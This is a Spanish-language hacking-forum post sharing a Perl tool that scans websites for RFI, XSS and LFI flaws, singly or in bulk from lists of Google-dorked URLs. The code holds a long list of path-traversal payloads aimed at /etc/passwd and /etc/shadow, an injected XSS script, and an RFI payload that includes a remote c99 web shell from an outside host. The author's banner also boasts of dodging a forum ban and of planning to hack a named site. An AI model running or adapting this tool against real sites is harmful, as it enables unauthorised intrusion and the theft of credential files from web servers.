Guason ah terminado su multi-scanner in perl. Espero q les sirva.
Este scanea
RFI
XSS
LFI (No disponible)
Entre otras opciones permite el scaneo single (solo una web) o un file para mayor comodidad con varias webs
El resultado se obtiene en el disco C "c:/"
Aca el code
#Name program = moe.pl
#Version = beta
#Autor = Guason
#Version = 1.0
use LWP::UserAgent;
use HTTP::Request;
use LWP::Simple;
menu:
system ("cls");
system (" mode con cols=150");
system ("mode con lines=100");
print q (
11111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111
11111111111111111111110000000010111111111111111111 ----------SINGLE SCAN-------------
11111111111111111111100000000000001111111111111111
11111111111111111111100000000000001111111111111111 1 - Scan XSS
11111111111111111111000110000100000111111111111111 2 - Scan LFI
11111111111111111110001000011011100011111111111111 3 - Scan RFI
11111111111111111000000000000000010011111111111111
11111111111111110000000100000000000011111111111111
11111111111111111000000000000000000111111111111111 --------------------------------------------
11111111111111110000000100000000000011111111111111
11111111111111110000000001010000000000011111111111
11111111111111110000001001111100000000011111111111
11111111111111110000000001111111011100011111111111 --------MULTIPLE SCAN----------
11111111111111111100000001111111001111111111111111
11111111111111111000010000000000001111111111111111 4 - Multiple scan XSS
11111111111111111110010000000000000011111111111111 5 - Multiple scan LFI (NO)
11111111111111111111100000000000000011111111111111 6 - Multiple scan RFI
11111111111111111111100000000000000000111111111111
11111111111111111111000000000000000000111111111111
11111111111111111111100000000000000000001111111111 --------------------------------------------
11111111111111100111100000000000000000001111111111
11111111111111110011110000000000011001111111111111
11111111111111111011111000000111111111111111111111
11111111111111111001111110001111111111111111111111
11111111111111111101111111111111111111111111111111
11111111111111111100111110000011111111111111111111
11111111111111111110111111010101111111111111111111 -----------------------------------------------
11111111111111111110011100000011111111111111111111
11111111111111111110011100110111111111111111111111 7 - About x
11111111111111111110001111110011111111111111111111 8 - Salir del programa
11111111111111111111111111111011111111111111111111
11111111111111111111111111111001111111111111111111
11111111111111111111001111111001111111111111111111 ---------------------------------------------
11111111111111111111001111111101111111111111111111
11111111111111111111001111111101111111111111111111 Autor = Guason
11111111111111111111011111111111111111111111111111
11111111111111111111011111111111111111111111111111
11111111111111111111011111111111111111111111111111
);
print "\n\n";
print "Escoge opcion =";
$opcion = <STDIN>;
chomp $opcion;
print "\n";
if ($opcion == 1 ) { &xss }
if ($opcion == 2 ) { &lfi }
if ($opcion == 3 ) { &rfi }
if ($opcion == 4 ) { &m_xss }
if ($opcion == 5 ) { &m_lfi }
if ($opcion == 6 ) { &m_rfi }
if ($opcion == 7 ) { &about }
if ($opcion == 8 ) { &salir }
if ($opcion =! 1||2||3||4||5||6||7||8) {goto menu ;}
sub lfi {
system ("cls");
print "\n\n";
print "Pagina web a probar con LFI :::";
$lfi = <STDIN>;
chomp $lfi;
print "\n\n";
print "Objectivo : $lfi\n\nn";
if($lfi !~/http:\/\//){
$lfi ="http://$lfi";}
@devil=(
'../../etc/passwd%00',
'../../../etc/passwd%00',
'../../../../etc/passwd%00',
'../../../../../etc/passwd%00',
'../../../../../../etc/passwd%00',
'../../../../../../../etc/passwd%00',
'../../../../../../../../etc/passwd%00',
'../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../../../../../../..etc/passwd%00',
'../../etc/passwd',
'../../../etc/passwd',
'../../../../etc/passwd',
'../../../../../etc/passwd',
'../../../../../../etc/passwd',
'../../../../../../../etc/passwd',
'../../../../../../../../etc/passwd',
'../../../../../../../../../etc/passwd',
'../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../../../..etc/passwd',
'../etc/shadow',
'../../etc/shadow',
'../../../etc/shadow',
'../../../../etc/shadow',
'../../../../../etc/shadow',
'../../../../../../etc/shadow',
'../../../../../../../etc/shadow',
'../../../../../../../../etc/shadow',
'../../../../../../../../../etc/shadow',
'../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../../../../etc/shadow',
'../etc/group',
'../../etc/group',
'../../../etc/group',
'../../../../etc/group',
'../../../../../etc/group',
'../../../../../../etc/group',
'../../../../../../../etc/group',
'../../../../../../../../etc/group',
'../../../../../../../../../etc/group',
'../../../../../../../../../../etc/group',
'../../../../../../../../../../../etc/group',
'../../../../../../../../../../../../etc/group',
'../../../../../../../../../../../../../etc/group',
'../../../../../../../../../../../../../../etc/group',
'../etc/security/group',
'../../etc/security/group',
'../../../etc/security/group',
'../../../../etc/security/group',
'../../../../../etc/security/group',
'../../../../../../etc/security/group',
'../../../../../../../etc/security/group',
'../../../../../../../../etc/security/group',
'../../../../../../../../../etc/security/group',
'../../../../../../../../../../etc/security/group',
'../../../../../../../../../../../etc/security/group',
'../etc/security/passwd',
'../../etc/security/passwd',
'../../../etc/security/passwd',
'../../../../etc/security/passwd',
'../../../../../etc/security/passwd',
'../../../../../../etc/security/passwd',
'../../../../../../../etc/security/passwd',
'../../../../../../../../etc/security/passwd',
'../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../../../../etc/security/passwd',
'../etc/security/user',
'../../etc/security/user',
'../../../etc/security/user',
'../../../../etc/security/user',
'../../../../../etc/security/user',
'../../../../../../etc/security/user',
'../../../../../../../etc/security/user',
'../../../../../../../../etc/security/user',
'../../../../../../../../../etc/security/user',
'../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../../../etc/security/user'
);
foreach $scan(@devil)
{
$run=$lfi.$scan;
print "Probando con $scan\n";
$request =HTTP::Request->new(GET=>$run);
$agent= LWP::UserAgent->new();
$response=$agent->request($request);
if($response->is_success && $response->content =~/root:x:/){
print "\n\n";
print "$lfi = Vulnerable\n";
}
}
print "\n";
syswrite STDOUT, "Presiona enter para volver al menu principal\n";
<STDIN>;
system ("cls");
goto menu;
}
sub xss {
system ("cls");
print "\n\n";
print "Escribe la web a explotar con XSS::";
$xssans = <STDIN>;
chomp $xssans;
print "\n\n";
print "Objectivo = $xssans\n\n";
$xsscode='>"<script>alert("Guason")</script><div style="1';
$xss=$xssans.$xsscode;
$agent=LWP::UserAgent->new();
$req=$agent->get("$xss");
if($req->is_success && $req->content=~/Guason/){
print "\n\n";
print "$xssans es Vulnerable\n\n";
} else {
print "\n\n";
print "No es vulnerable\n\n";
}
syswrite STDOUT, "Presiona enter para volver al menu principal\n";
<STDIN>;
system ("cls");
goto menu;
}
sub rfi {
system ("cls");
print "\n\n";
print "Url de la web a explotar con RFI::";
$rfi = <STDIN>;
chomp $rfi;
print "\n\n";
print "Objectivo = $rfi\n\n";
$rficode="http://younes.by.ru/c99.txt";
$rfid=$rfi.$rficode;
$request =HTTP::Request->new(GET=>$rfid);
$agent= LWP::UserAgent->new();
$response=$agent->request($request);
if($response->is_success && $response->content =~/c99/){
print "\n\n";
print "Es vulnerable !\n";
} else {
print "\n\n";
print "No es vulnerable\n\n";
}
syswrite STDOUT, "Presiona enter para volver al menu principal\n";
<STDIN>;
system ("cls");
goto menu;
}
################################LFI_M is obsolete ########################################33
sub m_lfi {
print "\n";
syswrite STDOUT, "Presiona enter para volver al menu principal\n";
<STDIN>;
system ("cls");
goto menu;
}
sub m_xss {
print "\n\n";
print "Url de los googles para XSS:";
$xss= <STDIN>;
chomp $xss;
open ( M_XSS , ">>c:/m_xss.txt" ) ;
print M_XSS "Extrayendo vulnerabilidades XSS de $xss\n\n";
open ( HOLA , $xss ) ;
@googles = <HOLA>;
close HOLA;
foreach $xsss(@googles){
$xsscode='>"<script>alert("Guason")</script><div style="1';
$xss=$xsss.$xsscode;
$agent=LWP::UserAgent->new();
$req=$agent->get("$xss");
if($req->is_success && $req->content=~/Guason/){
print "$xsss = Yes!\n";
print M_XSS "$xsss = Yes!\n";
} else {
print "$xsss = No!\n";
print M_XSS "$xsss = No!\n";
}
}
print "\n";
syswrite STDOUT, "Presiona enter para volver al menu principal\n";
<STDIN>;
system ("cls");
goto menu;
}
sub m_rfi {
print "\n\n";
print "Url de los googles para RFI:";
$rfi= <STDIN>;
chomp $rfi;
open ( M_RFI , ">>c:/m_rfi.txt") ;
print M_RFI "Extrayendo vulnerabilidades RFI de $rfi\n\n";
open ( HOLA , $rfi ) ;
@googles = <HOLA>;
close HOLA;
foreach $rfis(@googles) {
$rficode="http://younes.by.ru/c99.txt";
$rfid=$rfis.$rficode;
$request =HTTP::Request->new(GET=>$rfid);
$agent= LWP::UserAgent->new();
$response=$agent->request($request);
if($response->is_success && $response->content =~/c99/){
print "$rfis = Es vulnerable\n";
print M_RFI "$rfis = Es vulnerable\n";
} else {
print "$rfis = No es vulnerable\n";
print M_RFI "$rfis = No es vulnerable\n";
}
}
print "\n";
syswrite STDOUT, "Presiona enter para volver al menu principal\n";
<STDIN>;
system ("cls");
goto menu;
}
sub about {
system ("cls");
print q (
@@@@@@@@@@@@@@@@@@@@@@@@@*@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@ *@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@* ***@*@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@***@@@@@*@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@**@@@@@@@@*@@@@@@@@@@@@
@@@@@@@@@@@@@@@ *@@@@@@@@@@ @@@@@@@@@@@@
@@@@@@@@@@@@@@@**@@@@@@@@@@**@@@@@@@@@@@
@@@@@@@@@@@@@@@@ @@@@@@@@@@@**@@@@@@@@@@
@@@@@@@@@@@@@@@@**@@@@@@@@@@@**@@@@@@@@@
@@@@@@@@@@@@@@@@@ @@@@@@*****@@@@@@@@@@@
@@@@@@@@@@@@@@@@@**@@@@*@@@* @@@@@@@@@@@
@@@@@@@@@@@@@@@@@@ @@@@*@@@@**@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@*@@@*@@@@ @@@@@@@@@
@@@@@@@@@@@@@@@@@@@*@** *@@ @@@@@@@@@
@@@@@@@@@@@@@@@@@@@* @@@@@@@@
@@@@@@@@@@@@@@@@@@@ @@@@@@@@
@@@@@@@@@@@@@@@@@@@ @@@@@@@@
@@@@@@@@@@@@@@@@@@@@ *@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@ *@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@
@@@@@@@@@@@@@@@@**@@@*@ *@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@ @@@@@@ @@@@@@@@@@@@@
@@@@@@@@@@@@@@@* *@@@@@ @@*@@@@ @@@@@@@
@@@@@@@@@@@@@@@ *@@@@@@@@@@@@ @@@@@@
@@@@@@@@@@@@@@@ @*@@@@@@@@@ @@@@@@
@@@@@@@@@@@@@@@ @@@@@@@@@@ *@@@@@
@@@@@@@@@@@@@@@ @@@@@@@@@@* @@@@@@
@@@@@@@@@@@@@@@ @@@@@@@@@ @@@@@@
@@@@@@@@@@@@@@@ *@@@@@@@@ *@@@@@@
@@@@@@@@@@@@@@ @@@@@@@@@ *@@@@@@
@@@@@@@@@@@@@@ @ * *@@@@@@@@@ *@@@@@@
@@@@@@@@@@@@****@ *@@@@@@@@@@@* ***@@@@@
@@@@@@@@@@@****@@**@@@@@@@@@@@ *@ **@@@@
@@@@@@@@@@**@* @@**@@@@@@@@@@@**@***@@@@
@@@@@@@@@@*@@ *@@*@@@@@@@@@@@@@*@**@@@@@
@@@@@@@@@@@@* *@*@@@@@@@**@@@@@*** **@@@
@@@@@@@@@@*@* ****@@@@@@ *@@@@* @@* *@@@
@@@@@@@@@@ @**@@* @@@@****** @@@@**@@@
@@@@@@@@@@***@@@@ *@* @@@@@@@@@
@@@@@@@@@@@ @@@@@* *@@@@@@ *@@@@@@@@@
@@@@@@@@@@@@@@@@@ @@@@@@@ *@@@@@@@@@
@@@@@@@@@@@@@@@@@** *@@@@@@* **@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@*@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@*@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@***@*@@@@@@@@@***@@@@@@@@
Este programa fue escrito por Guason = me
Este lo realice en dos fases uno Viendo porno y otro jugando al mithlogy titans
Este ayuda a verificar vulnerabiliades de una web o de un archivo entero lo que me es
mucho mas comodo .......
Simplemente no mando saludos a nadie mmm talvez a explorer de perlenespañol y a soulnet
los demas por mi mueranse y pronto voy a hackear el-hacker.net muaaaaaaaaa ajajajajajajaja
ajajajajajajajajajaj ajajajajajajajajajaj ajajajajajajajajajaj ajajajajajajajajajaj ajajajajajajajajajaj
Tambien mando saludos a los moderadores de el-hacker quienes piensan que se han desazido de mi baneandome pero NO! porque todavia estoy ahi y me meto en sus narices
Ja! Pero que malo que soy !
Mis datos =
nOMBRE = Salchichon
Emal = [email protected]
Web = http://guason-cracker.blogspot.com/
);
print "\n";
syswrite STDOUT, "Presiona enter para volver al menu principal\n";
<STDIN>;
system ("cls");
goto menu;
}
sub salir {
print "\n\n";
print "Good Bye\n\n\n";
exit 1;
}
Good Bye y suerte a todos